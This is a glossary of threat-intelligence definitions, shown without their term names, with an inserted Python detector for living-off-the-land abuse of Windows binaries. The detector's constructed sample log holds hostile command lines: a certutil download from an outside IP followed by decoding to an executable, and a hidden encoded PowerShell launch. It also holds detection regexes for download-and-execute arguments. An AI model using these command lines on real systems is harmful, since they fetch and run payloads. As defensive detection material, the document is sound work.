Threat Intelligence Terms
148 terms
A proactive process of identifying, quantifying, and addressing potential cyber threats against systems.
Detailed blueprints that replicate known attacker behaviors to assess and improve cybersecurity readiness.
Programs that replicate attacker behavior to test and improve an organization's defensive capabilities.
Protection mechanisms for artificial intelligence systems.
Utilizing artificial intelligence to identify irregular system behaviors that may signal a cyber threat.
Leveraging artificial intelligence to predict and prepare for emerging cybersecurity risks.
Utilizing sophisticated algorithms to scan large data sets for patterns indicative of cyber attacks.
A sophisticated ransomware-as-a-service group known for pioneering triple extortion tactics, being the first major group…
The process of analyzing the sequence of events that occur during a cyber attack.
Tools for studying how attacks progress through systems.
Techniques for breaking the sequence of events in a cyber attack.
The process of documenting and analyzing the steps taken during a cyber attack.
Creating visual representations of attack sequences.
The process of evaluating the financial impact of cyber attacks.
The creation of visual representations of potential attack paths through a system.
The process of identifying and analyzing potential routes attackers could take through a network.
Testing whether theoretical attack paths are actually exploitable.
The study of common attack methodologies to improve defense strategies.
A collection of documented cyber attack methodologies.
Identifying common patterns in cyber attacks.
Evaluating how well systems can withstand various types of attacks.
Visual representation of attack progression.
Creating detailed models of how attacks progress through systems.
Unique pattern identifying specific exploit methods or malware families through behavioral analysis.
Tools that enable organizations to test their security by simulating real attacks.
Tools that replicate real-world cyber attack scenarios to test and refine defensive measures.
The sum of all points in a system where an unauthorized party could attempt to enter it or extract data from it.
Software used to identify and assess potential vulnerabilities.
Structured approach to evaluating vulnerabilities.
Standard reference point for vulnerability assessment.
The continuous process of identifying new potential entry points for attacks.
Systematically identifying all possible attack vectors.
The continuous discovery, inventory, classification, and monitoring of an organization's IT infrastructure.
Tools for discovering and managing potential vulnerabilities.
Software for identifying and visualizing potential vulnerabilities.
Continuous observation of potential vulnerability points.
The practice of minimizing the number of potential entry points for cyber attacks.
Planned approach to minimizing potential entry points for attacks.
Tools that create visual representations of an organization's potential vulnerabilities.
Graphical mapping of an organization's potential entry points for cyber attacks to aid in risk management.
Tools for displaying potential vulnerabilities.
Real-time visualization of threat activity across attack surfaces.
A visual diagram mapping potential attack vectors against a system, used to assess security risks and mitigation strateg…
The process of identifying and analyzing potential methods of attack.
The process of discovering potential paths for cyber attacks.
Ranking potential attack methods by their likelihood and potential impact to guide remediation efforts.
Enhancing traditional threat intelligence with additional contextual data for deeper analysis.
The use of algorithms to continuously assign risk scores to assets based on current threat intelligence.
Prioritizing security vulnerabilities.
The analysis of user and system behavior patterns to proactively detect potential cybersecurity breaches.
Assigning risk ratings based on observed user and system behavior patterns to inform security decisions.
Leveraging behavioral data to detect emerging threats and predict attacker actions.
Evaluation of blockchain protections.
Tools that enable organizations to simulate cyber attacks against their systems to test their security.
A method of guessing credentials through repeated, usually automated, trial-and-error attempts.
An attack technique where threat actors load a legitimate but vulnerable kernel-mode driver into a target system to expl…
A Russian-linked cybercriminal group best known for conducting mass exploitation campaigns against enterprise file trans…
Security assessment using AI-driven analysis.
The application of cognitive computing methods to improve the analysis and interpretation of security data.
Systems that enable organizations to share and analyze threat data collectively.
A standardized system for rating the severity of software vulnerabilities; its scores are commonly used as one input when prioritizing remediation.
Analyzing risk by considering the broader operational and threat context in which an organization operates.
The process of linking threat data from different IT domains to gain a holistic view of potential risks.
Aggregating and correlating threat data from multiple operating systems and environments.
Techniques to determine the origin and identity of threat actors responsible for cyber attacks.
Techniques that use false data and decoys to mislead attackers and reveal their methods.
Strategies designed to detect, prevent, and respond to intelligence-gathering cyber intrusions.
The process of tracking and identifying the perpetrator of a cyberattack and attributing responsibility to them.
Visualizing the relationships among various threat actors, vulnerabilities, and incidents within a digital ecosystem.
The consolidation of threat intelligence data from various sources to provide a comprehensive security view.
The practice of proactively searching for cyber threats that are lurking undetected in a network.
Software that scans hidden parts of the internet for compromised data and emerging threats.
The study and mapping of hidden network structures used by cybercriminals to coordinate attacks.
Overwhelming target systems with excessive traffic to disrupt service availability.
Distributing the responsibility for threat hunting across multiple teams or systems to improve coverage.
Incorporating decoy systems and misleading data into networks to confuse and detect attackers.
Using deceptive strategies to misdirect attackers and gather intelligence about their methods.
The careful planning and maintenance of fake digital assets intended to distract or detect intruders.
Assessing an organization's online presence to identify potential exposures and vulnerabilities.
Systems that deploy decoy assets and misinformation in real time to mislead and trap attackers.
Pre-packaged tools automating vulnerability exploitation, often distributed via malicious ads or compromised sites.
The use of graph theory to map relationships between threat actors, events, and attack vectors for improved analysis.
The strategic implementation of interconnected honeypots to attract and analyze malicious cyber activities.
Systems that combine multiple sources and types of threat intelligence to deliver a comprehensive security overview.
Cybercriminal specialists who focus exclusively on gaining unauthorized access to organizational networks and then selli…
Tools and strategies aimed at detecting and mitigating threats originating from within an organization.
Security risks arising from employees or contractors who mishandle data or misuse their access, whether through negligence or malicious intent.
Techniques that monitor and analyze internal user behavior to identify potential malicious activities.
Techniques for identifying and monitoring internal users whose behavior deviates from the norm.
Comprehensive systems that unify multiple security functions into a single management console.
An attack technique where adversaries use legitimate, pre-installed operating system tools, utilities, and features — ra…
Cyber attacks that use legitimate, built-in system tools to carry out malicious activities.
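As an added example (not from the original page), the following Python shows what detection of living-off-the-land activity looks like in practice: it scores Windows process-creation events by which built-in binary ran, whether its command line carries download, decode or encoded-command arguments, and whether an Office application spawned it. The log format, the binary list, the regexes, the parent-process list and the scoring thresholds are illustrative assumptions, and the log lines are constructed.

```python
"""Flag living-off-the-land (LOTL) activity in process-creation logs.

Added example with constructed data and simplified heuristics; not code
from the original page. Log format (assumed):
    timestamp|host|user|parent_image|image_path|command_line
"""
import re
from typing import Dict, List, Tuple

# Built-in Windows binaries commonly abused for download, decode or execution
# (small illustrative subset; a real rule set would be far larger).
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "powershell.exe", "wmic.exe", "bitsadmin.exe"}

# Command-line patterns that turn a legitimate tool into a delivery/execution vector.
SUSPICIOUS_ARGS = {
    "certutil.exe": [re.compile(r"-urlcache", re.I), re.compile(r"-decode", re.I)],
    "regsvr32.exe": [re.compile(r"/i:https?://", re.I), re.compile(r"scrobj\.dll", re.I)],
    "mshta.exe": [re.compile(r"https?://", re.I), re.compile(r"(vb|j)script:", re.I)],
    "rundll32.exe": [re.compile(r"javascript:", re.I), re.compile(r"\\users\\", re.I)],
    "powershell.exe": [re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
                       re.compile(r"downloadstring|iex|invoke-expression", re.I)],
    "wmic.exe": [re.compile(r"process\s+call\s+create", re.I)],
    "bitsadmin.exe": [re.compile(r"/transfer", re.I)],
}

# A system tool launched by an Office document is a classic phishing-to-execution chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Constructed sample log: one benign editor launch, a certutil download-and-decode
# chain from Word, a legitimate admin certutil call, an encoded PowerShell command
# spawned by Outlook, and an interactive PowerShell session.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z|WS01|alice|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt
2024-03-01T10:02:15Z|WS01|alice|winword.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\\Users\\alice\\a.txt
2024-03-01T10:02:20Z|WS01|alice|cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -decode C:\\Users\\alice\\a.txt C:\\Users\\alice\\a.exe
2024-03-01T10:05:00Z|WS02|svc_backup|services.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -verify cert.cer
2024-03-01T10:06:30Z|WS03|bob|outlook.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2024-03-01T10:07:00Z|WS03|bob|explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-ChildItem
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one pipe-delimited event; the command line may itself contain pipes."""
    ts, host, user, parent, image, cmdline = line.split("|", 5)
    return {"ts": ts, "host": host, "user": user, "parent": parent.lower(),
            "image": image.rsplit("\\", 1)[-1].lower(), "cmdline": cmdline}


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons). A bare LOLBin launch scores 1: common admin activity.
    Suspicious arguments and an Office parent each add 3, so either one crosses the
    default alert threshold only in combination with the LOLBin itself."""
    reasons: List[str] = []
    image = ev["image"]
    if image not in LOLBINS:
        return 0, reasons
    score = 1
    reasons.append(f"lolbin:{image}")
    for pat in SUSPICIOUS_ARGS.get(image, []):
        if pat.search(ev["cmdline"]):
            score += 3
            reasons.append(f"args:{pat.pattern}")
    if ev["parent"] in OFFICE_PARENTS:
        score += 3
        reasons.append(f"office-parent:{ev['parent']}")
    return score, reasons


def detect(log_text: str, threshold: int = 4) -> List[Dict]:
    """Return the events whose score reaches the threshold, in log order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({**ev, "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['ts']} {a['host']} {a['user']} score={a['score']} {a['reasons']}")
```

Running it on the sample flags the two certutil steps of the download-and-decode chain and the encoded PowerShell launched from Outlook, while the admin's `certutil -verify` and the interactive `Get-ChildItem` session stay below the threshold. The point of the score rather than a plain allow/deny list is exactly the LOTL problem: the binaries are legitimate, so the signal has to come from arguments and process lineage, not from the executable name.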
The world's most prolific ransomware-as-a-service (RaaS) operation from 2021 through 2024, responsible for thousands of …
Vulnerabilities specific to ML systems.
Utilizing logical inference systems to enhance automated threat detection and response.
Weaknesses in AI neural networks.
Structured methodologies and toolkits for simulating attacks to evaluate system security.
Leveraging data analytics to forecast potential cyber threats before they materialize.
Measurement of privacy risk levels.
A rapidly growing ransomware-as-a-service operation that emerged in February 2024 and quickly became the most active ran…
Advanced algorithms designed to identify deviations from normal behavior as they occur.
Methods for linking disparate threat data in real time to provide actionable security insights.
Software solutions that mimic adversary tactics to test and improve an organization's defensive measures.
A Chinese state-sponsored advanced persistent threat (APT) group that conducted widespread intrusions into major US tele…
A Chinese state-sponsored APT group (formerly tracked as Hafnium) responsible for the late 2024 compromise of the US Tre…
Surveillance of blockchain contract execution.
Structure for contract validation.
Tool for finding contract weaknesses.
Exercises designed to mimic social engineering attacks, testing an organization's resilience against human-targeted thre…
The long-term collection and analysis of threat data to inform an organization's cybersecurity strategy.
A cyber attack that reaches an organization by compromising less secure elements of its supply chain, such as vendors, service providers, or software components.
Third-party vendor breaches enabling simultaneous infiltration of multiple downstream organizations.
System for identifying attack sources.
Analyzing attacker patterns.
Studying specific attack campaigns.
Monitoring specific adversary activities.
Evaluating attacker abilities.
Technical resources used by attackers.
Analyzing patterns and behaviors of cyber attackers.
The process of analyzing attacker behaviors and tactics to create detailed profiles for threat identification.
Monitoring specific adversaries.
The process of augmenting raw threat data with additional contextual information for better decision making.
Tools that simulate realistic attack scenarios to test the resilience of cybersecurity defenses.
Proactive strategies and techniques used to search for hidden adversaries within networks.
Documented procedures for proactive threat detection.
Structure for analyzing threat data.
Handling multiple threat data sources.
A technology that collects, correlates, and analyzes threat data from multiple sources.
Structure of threat data systems.
Connecting threat data sources.
Measuring threat data reliability.
Evaluating the reliability of threat information.
System for exchanging threat data.
Standardized methods that facilitate the secure exchange of threat information among organizations.
Creating visual representations of cyber threat data to improve situational awareness and strategic planning.
Tools and processes that automate the identification and analysis of potential security threats.
Predictive analysis to understand how cyber threats might spread across interconnected systems.
Evaluating the various pathways that attackers might exploit to infiltrate systems.
Implementing artificial intelligence systems that are transparent, reliable, and secure for cyber defense.
VR-specific security vulnerabilities.
A Chinese state-sponsored APT group focused on pre-positioning within US critical infrastructure — including power grids…
Security weakness exploitable by threats.
Systematic identification/analysis of security weaknesses in systems.
Evaluation of blockchain-related risks.
Blockchain security surveillance.
Collection of blockchain vulnerabilities.
A cyber attack that exploits a software weakness before the vendor is aware of it or has released a fix, leaving defenders no days to prepare.
Attack targeting undisclosed software vulnerabilities before patches exist.